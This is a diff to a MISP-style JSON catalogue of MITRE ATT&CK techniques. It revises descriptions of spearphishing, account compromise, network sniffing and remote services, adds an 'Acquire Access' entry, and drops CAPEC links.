- "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)",
+ "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)",
"meta": {
"external_id": "T1566.002",
"kill_chain": [
@@ -20998,7 +21348,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1566/002",
"https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks",
- "https://capec.mitre.org/data/definitions/163.html",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
"https://us-cert.cisa.gov/ncas/tips/ST05-016",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
@@ -21015,7 +21364,7 @@
"value": "Spearphishing Link - T1566.002"
},
{
- "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
+ "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
"meta": {
"external_id": "T1586.002",
"kill_chain": [
@@ -21026,7 +21375,8 @@
],
"refs": [
"https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/",
- "https://attack.mitre.org/techniques/T1586/002"
+ "https://attack.mitre.org/techniques/T1586/002",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
},
"related": [
@@ -21155,9 +21505,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1543/003",
- "https://capec.mitre.org/data/definitions/478.html",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
"https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697",
"https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection",
"https://technet.microsoft.com/en-us/library/cc772408.aspx",
@@ -21248,8 +21595,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1543/004",
"https://bradleyjkemp.dev/post/launchdaemon-hijacking/",
- "https://capec.mitre.org/data/definitions/550.html",
- "https://capec.mitre.org/data/definitions/551.html",
"https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf",
"https://www.real-world-systems.com/docs/launchdPlist.1.html",
@@ -21537,7 +21882,7 @@
"value": "DNS Calculation - T1568.003"
},
{
- "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
+ "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
"meta": {
"external_id": "T1583.006",
"kill_chain": [
@@ -21640,7 +21985,7 @@
"value": "Employee Names - T1589.003"
},
{
- "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. \n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+ "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site.\n\nAdversaries may also link to \"web bugs\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
"meta": {
"external_id": "T1598.003",
"kill_chain": [
@@ -21656,10 +22001,13 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1598/003",
+ "https://csrc.nist.gov/glossary/term/web_bug",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
+ "https://mrd0x.com/browser-in-the-browser-phishing-attack/",
"https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
"https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages",
- "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
+ "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html",
+ "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials"
]
},
"related": [
@@ -21690,7 +22038,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/004",
- "https://capec.mitre.org/data/definitions/471.html",
"https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html",
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py",
"https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py",
@@ -21799,7 +22146,6 @@
"refs": [
"http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/",
"https://attack.mitre.org/techniques/T1546/008",
- "https://capec.mitre.org/data/definitions/558.html",
"https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html",
"https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
"https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom"
@@ -21815,7 +22161,7 @@
"value": "Accessibility Features - T1546.008"
},
{
- "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.",
+ "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.",
"meta": {
"external_id": "T1584.006",
"kill_chain": [
@@ -21962,7 +22308,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1547/009",
- "https://capec.mitre.org/data/definitions/132.html",
"https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence",
"https://www.youtube.com/watch?v=nJ0UsyiUEqQ"
]
@@ -22444,7 +22789,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1053",
- "https://capec.mitre.org/data/definitions/557.html",
"https://technet.microsoft.com/en-us/library/cc785125.aspx",
"https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
]
@@ -22488,7 +22832,7 @@
"value": "Develop KITs/KIQs - T1227"
},
{
- "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
+ "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
"meta": {
"external_id": "T1529",
"kill_chain": [
@@ -22664,7 +23008,6 @@
"refs": [
"https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/",
"https://attack.mitre.org/techniques/T1200",
- "https://capec.mitre.org/data/definitions/440.html",
"https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html",
"https://www.youtube.com/watch?v=fXthwl6ShOg",
"https://www.youtube.com/watch?v=lDvf4ScWbcQ"
@@ -22703,7 +23046,7 @@
"value": "Data Compressed - T1002"
},
{
- "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring)",
+ "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)",
"meta": {
"external_id": "T1040",
"kill_chain": [
@@ -22723,12 +23066,13 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1040",
- "https://capec.mitre.org/data/definitions/158.html",
"https://cloud.google.com/vpc/docs/packet-mirroring",
"https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html",
"https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview",
"https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512",
- "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/"
+ "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/",
+ "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html",
+ "https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
"uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
@@ -22796,6 +23140,7 @@
"mitre-attack:defense-evasion"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Deletion",
"File: File Metadata",
@@ -22806,6 +23151,7 @@
"Process: Process Creation",
"Scheduled Job: Scheduled Job Modification",
"User Account: User Account Authentication",
+ "User Account: User Account Deletion",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -22819,8 +23165,7 @@
"Google Workspace"
],
"refs": [
- "https://attack.mitre.org/techniques/T1070",
- "https://capec.mitre.org/data/definitions/93.html"
+ "https://attack.mitre.org/techniques/T1070"
]
},
"uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
@@ -22907,8 +23252,7 @@
"Network"
],
"refs": [
- "https://attack.mitre.org/techniques/T1110",
- "https://capec.mitre.org/data/definitions/49.html"
+ "https://attack.mitre.org/techniques/T1110"
]
},
"uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
@@ -22932,7 +23276,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1012",
- "https://capec.mitre.org/data/definitions/647.html",
"https://en.wikipedia.org/wiki/Windows_Registry"
]
},
@@ -22940,7 +23283,7 @@
"value": "Query Registry - T1012"
},
{
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
"meta": {
"external_id": "T1021",
"kill_chain": [
@@ -22963,7 +23306,6 @@
"refs": [
"http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html",
"https://attack.mitre.org/techniques/T1021",
- "https://capec.mitre.org/data/definitions/555.html",
"https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf",
"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins",
"https://support.apple.com/en-us/HT201710",
@@ -23142,15 +23484,7 @@
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
]
},
- "related": [
- {
- "dest-uuid": "6747daa2-3533-4e78-8fb8-446ebb86448a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "revoked-by"
- }
- ],
+ "related": [],
"uuid": "06780952-177c-4247-b978-79c357fb311f",
"value": "Plist Modification - T1150"
},
@@ -24089,7 +24423,6 @@
"http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html",
"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"https://attack.mitre.org/techniques/T1055",
- "https://capec.mitre.org/data/definitions/640.html",
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://www.gnu.org/software/acct/"
@@ -24098,6 +24431,27 @@
"uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"value": "Process Injection - T1055"
},
+ {
+ "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+ "meta": {
+ "external_id": "T1650",
+ "kill_chain": [
+ "mitre-attack:resource-development"
+ ],
+ "mitre_platforms": [
+ "PRE"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1650",
+ "https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a",
+ "https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/",
+ "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ ]
+ },
+ "uuid": "d21bb61f-08ad-4dc1-b001-81ca6cb79954",
+ "value": "Acquire Access - T1650"
+ },
{
"description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
"meta": {
@@ -24122,15 +24476,14 @@
],
"refs": [
"http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf",
- "https://attack.mitre.org/techniques/T1056",
- "https://capec.mitre.org/data/definitions/569.html"
+ "https://attack.mitre.org/techniques/T1056"
]
},
"uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
"value": "Input Capture - T1056"
},
{
- "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.",
